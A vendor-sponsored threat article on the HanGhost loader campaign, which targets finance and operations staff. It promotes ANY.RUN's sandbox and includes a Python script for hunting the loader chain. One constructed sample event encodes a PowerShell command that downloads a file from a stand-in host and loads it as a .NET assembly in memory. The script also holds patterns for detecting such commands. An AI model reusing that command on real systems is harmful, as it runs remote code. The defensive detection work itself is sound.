Disclosure: This article was provided by ANY.RUN. The information and analysis presented are based on their research and findings.
A new malware campaign built around the HanGhost loader is actively targeting corporate environments, focusing on employees involved in payments, logistics, and contract operations. The attack is designed to operate without leaving clear artifacts, allowing it to reach systems linked to revenue and operations before being fully analyzed.
The campaign has already shown multiple waves of activity with different malware families, indicating active development and scaling rather than a one-off attack.
How the Attack Unfolds and Why Most SOCs See It Too Late
The attack chain combines multiple techniques that individually look benign but together create a highly evasive execution flow.
It starts with obfuscated JavaScript that executes hidden PowerShell commands. These commands execute a .NET loader directly in memory, which then retrieves a seemingly harmless image file containing an encrypted payload. The payload is extracted and executed without ever being written to disk.

This chain is used to deliver multiple malware families, including PureHVNC, XWorm, Meduza, AgentTesla, and Phantom, with some cases also deploying UltraVNC for persistent remote access.
Because each stage looks benign on its own, the chain produces alerts that are either low priority or lack enough context, which slows down triage and delays response.
Attackers Are Targeting Finance and Operations Roles in Businesses
The targeting model is deliberate. Instead of aiming at infrastructure or privileged admins, attackers focus on users who interact with financial processes and operational systems on a daily basis.
These users regularly execute scripts, open attachments, and communicate externally, which makes malicious activity harder to distinguish from normal behavior. Once compromised, their access can be used to influence transactions, documents, and internal workflows.
- Persistent remote access: Tools like PureHVNC and XWorm allow continuous monitoring and control
- Payment systems exposure: Attackers can intercept or modify transaction details during execution
- Contract manipulation risk: Access to documents and email threads enables unauthorized changes or fraud
- Logistics disruption: Compromised workflows can delay shipments and break operational processes
The impact is linked directly to how these roles interact with business processes, not just system access.
3 Steps CISOs Need to Take to Detect and Stop HanGhost Early
Stopping HanGhost requires changing how triage, response, and threat hunting actually work under pressure. The attack succeeds because teams spend too much time validating signals and not enough time understanding behavior early.
Fix Triage to Show Behavior, Not Indicators
Analysts cannot rely on hashes, domains, or reputation for this type of attack because most of the chain runs in memory and constantly changes. Triage has to start with execution.

Suspicious files, scripts, and links need to be detonated immediately in an interactive sandbox so the team can see the real process chain, network activity, and hidden stages.
ANY.RUN’s Interactive Sandbox provides SOC teams with a fast, integration-ready solution for detecting malware and phishing attacks inside fully interactive virtual environments across Windows, macOS, Linux, and Android.
Its detection capabilities let Tier 1 analysts validate alerts, emails, files, and URLs in minutes, keeping MTTR short and preventing the attack from evolving into a business security breach.
Rebuild Response Around the Full Execution Chain
Containment decisions cannot be based on isolated alerts or single indicators. Teams need to see the full execution chain, from the initial script to the final payload, and use that to define scope and response actions.

Threat intelligence connects infrastructure, behaviors, and related activity, allowing responders to understand how far the attack may have spread and what needs to be blocked beyond the initial entry point.
Turn Threat Hunting into a Continuation of Real Incidents
Threat hunting should not rely on generic techniques when dealing with active campaigns like this. It needs to start from confirmed behavior observed during triage and response.
Once one case is identified, teams should immediately search for the same execution patterns across the environment and use threat intelligence to identify related activity seen in other organizations. ANY.RUN’s TI Lookup provides SOC teams with the latest attack intel from 15,000 organizations, delivering instant, actionable context on over 40 types of IOCs and giving an industry and geo threat landscape view.
This expands detection coverage and reduces the chance of missed compromises.
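The execution pattern described earlier (a script host launching hidden, encoded PowerShell that loads a .NET assembly in memory and fetches an image file) is what a hunt should search for across process telemetry. The following is an added example, not ANY.RUN's code: it scores Sysmon-style process-creation records for that chain and decodes the `-EncodedCommand` payload so the analyst sees what the hidden command does. Field names, the script-host list and the sample events are assumptions constructed for illustration.

```python
import base64
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
HIDDEN_FLAG = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
INMEM_HINTS = ("reflection.assembly", "::load(")          # .NET assembly loaded from bytes
IMAGE_URL = re.compile(r"https?://\S+\.(?:png|jpg|jpeg|gif|bmp)\b", re.I)

def decode_encoded_command(cmdline):
    """-EncodedCommand carries base64 of a UTF-16LE script; return it decoded, or None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):   # malformed base64 is itself worth a look
        return None

def find_loader_chains(events):
    """Flag powershell.exe spawned by a script host and list the evasive traits seen."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        parent = by_pid.get(e["ppid"])
        if e["image"].lower() != "powershell.exe" or not parent \
                or parent["image"].lower() not in SCRIPT_HOSTS:
            continue
        decoded = decode_encoded_command(e["cmdline"]) or ""
        checks = [("hidden window", HIDDEN_FLAG.search(e["cmdline"])),
                  ("encoded command", bool(decoded)),
                  ("in-memory .NET load", any(h in decoded.lower() for h in INMEM_HINTS)),
                  ("fetches image file", IMAGE_URL.search(decoded))]
        reasons = ["spawned by " + parent["image"]] + [name for name, hit in checks if hit]
        findings.append({"pid": e["pid"], "decoded": decoded, "reasons": reasons})
    return findings

# Constructed Sysmon-style events (field names are assumptions, not real telemetry).
def _enc(script):
    return base64.b64encode(script.encode("utf-16le")).decode()

SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": "explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": "wscript.exe", "cmdline": "wscript.exe invoice.js"},
    {"pid": 300, "ppid": 200, "image": "powershell.exe", "cmdline": "powershell.exe -w hidden -nop -enc "
     + _enc("$b=(New-Object Net.WebClient).DownloadData('http://example.invalid/logo.png');"
            "[Reflection.Assembly]::Load($b)")},
    {"pid": 400, "ppid": 100, "image": "powershell.exe", "cmdline": "powershell.exe -File backup.ps1"},
]
```

Running `find_loader_chains(SAMPLE_EVENTS)` flags only pid 300 and returns the decoded script alongside the reasons, while the admin's `-File backup.ps1` launch from explorer.exe is left alone.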

When combined, these capabilities shift SOC operations from reactive validation to proactive understanding. That shift is what reduces dwell time, lowers incident cost, and prevents attacks from reaching business-critical systems.
Conclusion
HanGhost uses a multi-stage, fileless execution chain to deliver remote access malware and credential stealers while avoiding traditional detection. By combining obfuscated scripts, in-memory loaders, and payloads hidden inside image files, it allows attackers to reach systems linked to payments, contracts, and operations without leaving clear artifacts.
To stop this type of attack early, SOC teams need to execute suspicious files and scripts in a controlled environment to expose real behavior, and use real-time threat intelligence to understand how the activity connects to ongoing campaigns. This allows teams to detect the attack earlier, scope it correctly, and respond before it spreads further.